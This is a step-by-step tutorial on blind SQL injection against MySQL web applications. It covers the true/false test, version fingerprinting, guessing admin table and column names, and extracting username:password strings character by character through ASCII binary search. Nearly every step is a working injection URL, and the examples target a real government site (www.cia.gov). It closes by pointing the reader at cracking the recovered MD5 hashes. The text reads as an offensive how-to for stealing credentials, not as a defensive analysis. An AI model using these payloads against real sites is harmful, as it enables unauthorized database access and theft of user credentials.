Blind SQL injection: detailed tutorial

If you don't know about normal MySQL injection, turn around and learn it before you even consider learning this, because blind injection is a whole different story. In a normal injection the data you want is printed on the page (a UNION SELECT, a verbose error). In a blind injection nothing is printed: all you get is a yes/no answer from the page (it loads normally, or it comes back with content missing or an error), and you pull the data out one character at a time by asking true/false questions.

1. Test for vulnerability

So you have a site, let's say:

Code:
www.cia.gov/news.php?id=1

Just like normal MySQL injection you start by tampering with the id parameter, but for blind you put:

Code:
www.cia.gov/news.php?id=1 and 1=2

If you see text from the page missing, or an error message like "invalid id", or a raw database error, then it's vulnerable. This works because 1=2 is always false, so the WHERE clause matches nothing and the page has no row to display. You see, if it was:

Code:
www.cia.gov/news.php?id=1 and 1=1

then you would get the normal page, because 1=1 is always true. This pair (a true condition gives the normal page, a false condition does not) is the oracle everything below is built on: every later query is just "id=1 and <some condition>", and you read the answer off the page. Use the 1=1 page as your reference for "true" (a headline, a body of text, a certain page length) rather than the error page as your reference for "false", because many sites show the same generic error for a false condition and for a query that was syntactically broken, and you want to tell those apart.

2. MySQL version

To find the MySQL version you need to do this query:

Code:
www.cia.gov/news.php?id=1 and substring(@@version,1,1)=4

If the page comes back true (the normal page), then the version is 4. If not, then try:

Code:
www.cia.gov/news.php?id=1 and substring(@@version,1,1)=5

If it comes back true then it's version 5. @@version holds the server's version string (something like 5.0.51a-community) and substring(@@version,1,1) is its first character, so you are asking "does the version start with 4?", "does it start with 5?" and so on. Newer servers answer 8 (or 10 for MariaDB), so keep going if neither 4 nor 5 comes back true. The version matters because from 5.0 on you can read table and column names out of information_schema instead of guessing them; on version 4 you are stuck with the fuzzing in the next step.

3. Fuzzing tables and columns

To find the table name you need to guess it. So here is the query:

Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1

Here I have guessed the table admin; if the page loads true, then the table exists. E.g. the table name is actually administrator and we try:

Code:
(SELECT 1 from users limit 0,1)=1

Then it will return with an error, a.k.a. false, because MySQL cannot run a query against a table that does not exist. But if we did:

Code:
(SELECT 1 from administrator limit 0,1)=1

then it would not error, a.k.a. true. One catch: the subquery only returns 1 if the table has at least one row. An existing but empty table returns NULL, and NULL=1 is not true, so it looks exactly like a missing table.

Now for the column. So the table is administrator, and we found that by fuzzing; now we need the column name. We fuzz it by:

Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1

If the column password exists then it won't error. The concat(1,password) trick sticks a 1 in front of whatever the column holds, so the first character is always "1" and the comparison is true whenever the column exists, and false (from an "unknown column" error) when it doesn't. You get my drift: repeat with username, user, pass, email and so on until the page comes back true.

4. Extracting the password with ASCII

So now we have the table/column we need to extract. Well, as you know it won't just pop up on the screen, so we will need to use the ASCII code of each character. The query builds the string username:password for one row (0x3a is hex for the colon), cuts one character out of it with substring, turns that character into its ASCII number and compares the number against a guess:

Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99

If this returns true then you need to go higher:

Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>103

If this errors (false: the page comes back without its normal content), then it's greater than 99 but not greater than 103, so it is one of 100, 101, 102 or 103. Now try:

Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>101

Error, so it's greater than 99 but not greater than 101: 100 or 101. Lower:

Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>100

Error, so it's greater than 99 but not greater than 100, making it 100. The first character of the username:password string is 100, which if you put into an ASCII converter you will see is the letter d.

Now you need to find the next character. Notice how this one has ),2,1))>60 instead of ),1,1)):

Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),2,1))>60

So this will be doing the second character. Every guess halves the range that is left, so if you always guess the middle of what remains (start at >64, then >96 or >32, and so on) you never need more than eight queries per character, instead of creeping up one number at a time. Keep extracting characters until you reach a position where even >0 comes back false: substring past the end of the string returns an empty string, ascii() of that is 0, and that is how you know you have the whole thing. Then you will have the username and the hash / password. If what comes out is 32 hex characters it is most likely an MD5 hash, which you still have to crack separately.
Sketch-out

A good ASCII converter can be found at
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html